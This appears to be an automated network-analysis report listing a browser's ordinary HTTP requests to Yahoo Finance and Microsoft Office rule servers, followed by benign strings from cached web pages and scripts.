Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/nodes/2.ByyLg9CL.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/context.BGtg7DvY.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/Header.Db1Xn_Q6.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/contextUtil.DIxB3t2m.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/RMP.DAY9oSd8.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/Typography.BwmQDYSG.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/PageProgressBar.BGwewH1i.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/i13nUtil.C-uBpR7k.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/each.BExQfwb4.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.rV6zwFgL.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/nodes/13.BWRpJeYE.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/spread.CgU5AtxT.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/Dock.DnH4WZuW.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/initializeDock.BZZN2pZq.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/loadSparkline.P-xwuGpq.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/datetimeUtils.BKCxat1F.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/headerUtil.D8XWvN0j.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/Ads.Bxzxpy-0.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: chromecache_1324.2.drString found in binary or memory: "id": "com.yahoo.www.twa", equals www.yahoo.com (Yahoo)
Source: chromecache_1324.2.drString found in binary or memory: "android_package_name": "com.yahoo.www.twa", equals www.yahoo.com (Yahoo)
Source: chromecache_1586.2.dr, chromecache_1163.2.drString found in binary or memory: (@horobeyo) <a href=\"https://twitter.com/horobeyo/status/1841696456346145278?ref_src=twsrc%5Etfw\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:October 3, 2024;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">October 3, 2024</a></p></blockquote></div><div class=caas-da><div id=defaultINARTICLE></div></div><p>The Type 076 is not the first aviation-optimized warship with twin islands. Previously, this kind of design has been chosen for the significantly larger British <a href=\"https://www.twz.com/11855/all-you-need-to-know-about-the-royal-navys-new-carrier-and-its-maiden-voyage\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Queen Elizabeth class;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\"><em>Queen Elizabeth</em> class</a> aircraft carriers, and there are suggestions that it <a href=\"https://www.twz.com/27290/indias-first-ever-supercarrier-might-be-based-on-the-uks-queen-elizabeth-class\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:might also be chosen;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">might also be chosen</a> for India equals www.twitter.com (Twitter)
Source: chromecache_1302.2.drString found in binary or memory: */t.parse=function(e,t){if("string"!=typeof e)throw new TypeError("argument str must be a string");for(var o={},i=t||{},a=e.split(r),c=i.decode||n,l=0;l<a.length;l++){var d=a[l],p=d.indexOf("=");if(!(p<0)){var u=d.substr(0,p).trim(),m=d.substr(++p,d.length).trim();'"'==m[0]&&(m=m.slice(1,-1)),null==o[u]&&(o[u]=s(m,c))}}return o},t.serialize=function(e,t,n){var r=n||{},s=r.encode||o;if(!i.test(e))throw new TypeError("argument name is invalid");var a=s(t);if(a&&!i.test(a))throw new TypeError("argument val is invalid");var c=e+"="+a;if(null!=r.maxAge){var l=r.maxAge-0;if(isNaN(l))throw new Error("maxAge should be a Number");c+="; Max-Age="+Math.floor(l)}if(r.domain){if(!i.test(r.domain))throw new TypeError("option domain is invalid");c+="; Domain="+r.domain}if(r.path){if(!i.test(r.path))throw new TypeError("option path is invalid");c+="; Path="+r.path}r.expires&&(c+="; Expires="+r.expires.toUTCString());r.httpOnly&&(c+="; HttpOnly");r.secure&&(c+="; Secure");r.firstPartyOnly&&(c+="; First-Party-Only");return c};var n=decodeURIComponent,o=encodeURIComponent,r=/; */,i=/^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;function s(e,t){try{return t(e)}catch(t){return e}}}},t={};function n(o){var r=t[o];if(void 0!==r)return r.exports;var i=t[o]={exports:{}};return e[o](i,i.exports,n),i.exports}n.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return n.d(t,{a:t}),t},n.d=(e,t)=>{for(var o in t)n.o(t,o)&&!n.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:t[o]})},n.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),n.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";var e=n(586);const t=["aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","primetime.bluejeans.com","techcrunch.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),o=["cricket.yahoo.net","www.tumblr.com"].map((e=>e.replace(/\./g,"\\."))),r=new RegExp(`^https?://(${t.concat(o).join("|")})(:\\d+)?$`),i=/^https:\/\/[a-z]+\.surveymonkey\.com\/r\/(\w+)(?:\?([^#]+))?(?:#(\w+))?$/,s=/^https:\/\/yahooresearch\.qualtrics\.com\/jfe\/form\/(\w+)(?:\?([^#]+))?(?:#(\w+))?$/,a="Q_Language",c=/\w+/,l=/^[\w-]+$/,d={CLOSE:{en:"Close",es:"Cerrar",fr:"Fermer",de:"Schlie equals www.yahoo.com (Yahoo)
Source: chromecache_901.2.drString found in binary or memory: <a data-i13n=\"elm:affiliate_link;sellerN:Amazon;elmt:;cpos:2;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Amazon&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lP3RhZz15bGUwMS0yMCIsImNvbnRlbnRVdWlkIjoiMTJkZmJhOTktMDBjZi00ZjAxLWFjNzgtMDZkNmMwZDA3NTI0Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lIiwiZHluYW1pY0NlbnRyYWxUcmFja2luZ0lkIjp0cnVlLCJzaXRlSWQiOiJ1cy1saWZlc3R5bGUiLCJwYWdlSWQiOiIxcC1hdXRvbGluayIsImZlYXR1cmVJZCI6InRleHQtbGluayJ9&amp;signature=AQAAAXaLm2NpblP4SJ87PNBI8ko90Yh2187rppIpvGH1_ktl&amp;gcReferrer=https%3A%2F%2Fwww.amazon.com%2Famazonprime\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Amazon Prime members;elm:affiliate_link;sellerN:Amazon;elmt:;cpos:2;pos:1;itc:0;sec:content-canvas\">Amazon Prime members</a> can shop a multitude of fantastic deals, including an <a data-i13n=\"elm:affiliate_link;sellerN:Amazon;elmt:;cpos:3;pos:1\" 